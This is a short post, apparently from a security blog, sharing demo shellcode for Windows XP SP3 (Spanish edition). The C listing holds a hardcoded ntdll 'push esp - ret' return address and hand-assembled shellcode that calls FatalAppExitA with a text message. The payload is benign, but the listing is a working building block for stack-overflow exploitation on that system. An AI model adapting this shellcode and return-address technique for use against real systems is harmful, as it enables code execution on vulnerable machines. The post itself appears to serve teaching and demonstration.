Shellcode for Windows XP SP3 Professional SPA (DLLs version 5.1.2600.5512) / FatalAppExitA W32 API
Following previous post, I release here as well another shellcode used during demo session. Tested in the same environment than the previous one, Windows XP SP3 Professional Edition (SPA), kernel32.dll version 5.1.2600.5512 and ntdll.dll version 5.1.2600.5512.
int main(int argc, char *argv[])
{
char jmpNtdll[] = "\xB0\x9D\x92\x7C"; // push esp - ret (ntdll.dll)
char shellcode[] =
"\x31\xC9" // xor ecx, ecx
"\x51" // push ecx
"\x68\x6C\x61\x21\x21" // push 2121616C
"\x68\x6E\x61\x5F\x6F" // push 6F5F616E
"\x68\x63\x65\x5F\x75" // push 755F6563
"\x68\x6D\x65\x72\x65" // push 6572656D
"\x68\x5F\x73\x65\x5F" // push 5F65735F
"\x68\x6F\x6C\x61\x2C" // push 2C616C6F
"\x68\x6D\x6F\x5F\x6D" // push 6D5F6F6D
"\x68\x65\x5F\x63\x6F" // push 6F635F65
"\x68\x6E\x4E\x61\x6D" // push 6D614E6E
"\x68\x4E\x6F\x43\x6F" // push 6F436F4E
"\x68\x45\x73\x61\x5F" // push 5F617345
"\x8B\xCC" // mov ecx, esp
"\x33\xDB" // xor ebx, ebx
"\x51" // push ecx
"\x53" // push ebx
"\xBF\x01\x1C\x86\x7C" // mov edi, kernel32.FatalAppExitA + 1
"\x4F" // dec edi
"\xFF\xD7" // call edi
;
printf("%s%s\n", jmpNtdll, shellcode);
return 0;
}
